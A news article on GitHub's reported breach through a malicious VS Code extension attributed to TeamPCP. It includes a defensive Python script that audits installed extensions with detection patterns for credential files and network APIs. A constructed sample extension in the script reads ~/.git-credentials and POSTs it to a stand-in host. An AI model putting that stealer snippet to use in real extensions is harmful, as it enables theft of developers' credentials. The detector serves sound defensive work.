GitHub compromised through a malicious VS Code extension, resulting in the theft of 3,800 repositories.


      TL;DR: GitHub confirmed that the cybercriminal group TeamPCP exfiltrated around 3,800 internal code repositories after compromising an employee's device through a malicious VS Code extension. Although the Microsoft-owned platform stated that no customer data was affected, the breach underscores the growing danger of supply chain attacks aimed at developer tools.

      There is an irony in the largest code-hosting platform falling victim to its own ecosystem. On Tuesday, GitHub confirmed that a threat actor accessed nearly 3,800 internal repositories after taking over an employee's device through a malicious Visual Studio Code extension, one of the most significant breaches the Microsoft-owned company has reported.

      TeamPCP, also known as UNC6780, took responsibility for the attack on the Breached hacking forum, where they offered the stolen data—described as proprietary source code and internal files—starting at a price of $50,000. They threatened to leak the data if no buyer came forward.

      GitHub's investigation found that the incident began when an employee installed a malicious extension from the official VS Code Marketplace. That single installation was enough to give the attacker control of the employee's device and, from there, access to thousands of private repositories. GitHub said the attacker's claimed repository count was "directionally consistent" with its own findings.

      Upon discovering the breach, the company acted swiftly to isolate the affected device, remove the extension, and rotate important credentials within hours. GitHub emphasized that the breach involved only the exfiltration of internal repositories and no evidence showed any impact on customer data, enterprise accounts, or user-hosted repositories.

      Nonetheless, this incident serves as a stark reminder of how supply chain attacks focusing on developer tools can penetrate even the most security-aware organizations. TeamPCP has established a notable history in this area, having previously compromised Aqua Security’s Trivy vulnerability scanner, leading to the extraction of 92 GB of data from the European Commission’s AWS infrastructure. The group has also targeted Checkmarx’s KICS, the LiteLLM AI gateway library, the Telnyx SDK, TanStack, and packages linked to MistralAI.

      The VS Code Marketplace has become a growing target for supply chain attacks. An extension is arbitrary Node.js code that runs in the editor's extension host with the full privileges of the user who installed it: there is no permission prompt or sandbox of the kind browser extensions have, so a single install can read source trees, SSH keys, git credentials, and GitHub or cloud tokens on the developer's machine. That is the same property that makes a malicious npm or PyPI package dangerous, with the added twist that an extension persists and can activate every time the editor starts. GitHub has not disclosed the specific extension involved, and it remains unclear whether it was a newly published malicious listing or a compromised legitimate tool.
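One way to see what that lack of a permission model means in practice is to audit the extensions already installed on a developer machine. The following Python script is an added example for this article, not tooling from GitHub, Microsoft or any of the victims named here, and it does not identify the undisclosed extension from this incident. It walks an extensions directory (assumed to be ~/.vscode/extensions when run against a real machine), reads each extension's package.json, and flags always-on activation together with shipped JavaScript that spawns processes, opens network connections or touches credential files in the home directory. The publisher and extension names, the sample file contents and the heuristic patterns are all constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Audit the VS Code extensions installed on a developer machine.

Added example for this article, not GitHub's or Microsoft's tooling. It reads
each extension's package.json under an extensions directory (assumed to be
~/.vscode/extensions on Linux/macOS, %USERPROFILE%\\.vscode\\extensions on
Windows), then scans the shipped JavaScript for capabilities a credential
stealer needs. The sample extensions built below are constructed, not real.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import List, Optional

# Activation events that fire on every editor start, with no user action.
ALWAYS_ON = {"*", "onStartupFinished"}

# Node/VS Code APIs that together let an extension harvest and exfiltrate
# secrets. Heuristic regexes over the shipped JavaScript, not a full parser.
RISKY_APIS = {
    "spawn_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]"""),
    "network": re.compile(r"""require\(\s*['"](https?|net|dns|http2)['"]\s*\)|\bfetch\s*\("""),
    "credential_files": re.compile(r"""\.git-credentials|\.npmrc|\.ssh/|\.aws/credentials|hosts\.yml|\.netrc"""),
    "dynamic_code": re.compile(r"""\beval\s*\(|new\s+Function\s*\("""),
}
SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2, "info": 3}


def audit_extension(ext_dir: Path) -> Optional[dict]:
    """Return a finding for one extension directory, or None if it has no manifest."""
    manifest = ext_dir / "package.json"
    if not manifest.is_file():
        return None
    meta = json.loads(manifest.read_text(encoding="utf-8"))
    ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', ext_dir.name)}"
    always_on = bool(ALWAYS_ON & set(meta.get("activationEvents", [])))

    hits = set()
    # Scan every shipped .js file, bundled node_modules included: a payload can
    # hide in a vendored dependency rather than in the "main" entry point.
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        hits.update(label for label, pat in RISKY_APIS.items() if pat.search(text))

    # Credential-file access plus a way to run commands or phone home is the
    # stealer profile; always-on activation means no user action is needed.
    if "credential_files" in hits and hits & {"spawn_process", "network"}:
        severity = "high" if always_on else "medium"
    elif hits & {"spawn_process", "network", "dynamic_code"}:
        severity = "low"
    else:
        severity = "info"
    return {"id": ext_id, "version": meta.get("version", "?"), "always_on": always_on,
            "apis": sorted(hits), "severity": severity}


def audit_extensions_dir(root: Path) -> List[dict]:
    """Audit every extension directory under root, worst findings first."""
    findings = []
    for entry in sorted(root.iterdir()):
        if entry.is_dir():
            finding = audit_extension(entry)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


def build_constructed_sample(root: Path) -> None:
    """Write two constructed extensions: a harmless theme and a stealer-like one."""
    theme = root / "acme.nice-theme-1.0.0"
    theme.mkdir(parents=True)
    (theme / "package.json").write_text(json.dumps({
        "publisher": "acme", "name": "nice-theme", "version": "1.0.0"}))

    evil = root / "helpfultools.git-helper-2.3.1"
    (evil / "out").mkdir(parents=True)
    (evil / "package.json").write_text(json.dumps({
        "publisher": "helpfultools", "name": "git-helper", "version": "2.3.1",
        "main": "./out/extension.js", "activationEvents": ["*"]}))
    (evil / "out" / "extension.js").write_text(
        'const cp = require("child_process"), https = require("https");\n'
        'const os = require("os"), fs = require("fs"), path = require("path");\n'
        'function activate() {\n'
        '  // constructed stealer-like behaviour: read ~/.git-credentials and POST it\n'
        '  const p = path.join(os.homedir(), ".git-credentials");\n'
        '  const data = fs.existsSync(p) ? fs.readFileSync(p, "utf8") : "";\n'
        '  https.request({method: "POST", host: "example.invalid", path: "/c"}).end(data);\n'
        '}\n'
        'module.exports = { activate };\n')


def run_demo() -> List[dict]:
    """Build the constructed sample in a temp directory and audit it."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))
    build_constructed_sample(root)
    return audit_extensions_dir(root)


if __name__ == "__main__":
    import sys
    results = audit_extensions_dir(Path(sys.argv[1]).expanduser()) if len(sys.argv) > 1 else run_demo()
    for f in results:
        print(f"{f['severity']:<6} {f['id']}@{f['version']} always_on={f['always_on']} apis={','.join(f['apis'])}")
```

Run it with no arguments to audit the constructed sample, or pass the path to a real extensions directory. The heuristics are deliberately coarse: plenty of legitimate extensions spawn git or call an API, so a "high" finding is a prompt to read the extension's code and verify its publisher, not proof of compromise. If an extension does look wrong, the response GitHub described is the right one: remove it, isolate the host, and rotate every token the extension host could have read.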

      The timing is particularly concerning, as GitHub’s breach coincides with an uptick in software supply chain compromises affecting organizations across various sectors. The ShinyHunters group, which has previously worked with TeamPCP, recently leaked stolen data from the European Commission. OpenAI was targeted via a compromised TanStack package, and earlier this month, researchers identified hundreds of malicious npm packages from a campaign known as Mini Shai-Hulud linked to the same threat cluster.

      For GitHub, which supports more than 100 million developers and serves as crucial infrastructure for the global software industry, this breach raises challenging questions regarding the security of the tools developers rely on. If a platform based on code review and version control can be breached through a rogue extension, the implications for less secure organizations are troubling.

      GitHub stated that its investigation is ongoing, with external forensic support engaged to determine the full extent of the data accessed. The company shared information about the incident on X, reaffirming that customer data remained unaffected.

      Meanwhile, TeamPCP shows no sign of slowing down. From EU institutions to AI infrastructure to the foundations of open-source development, the group keeps applying the same strategy: compromise the tools an organization depends on, so that its perimeter controls never see the intrusion.
